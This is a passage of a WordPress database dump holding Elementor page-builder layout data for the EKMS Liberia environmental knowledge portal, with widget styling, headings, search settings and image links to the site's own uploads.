System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}]},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(26947,3924,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26948,3924,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26950,3925,'_elementor_edit_mode','builder'),(26951,3925,'_elementor_template_type','single-post'),(26952,3925,'_elementor_version','3.4.0'),(26953,3925,'_elementor_pro_version','3.3.6'),(26954,3925,'_wp_page_template','default'),(26955,3925,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(26957,3925,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26958,3925,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26972,3927,'_wp_page_template','default'),(26973,3927,'_elementor_edit_mode','builder'),(26974,3927,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"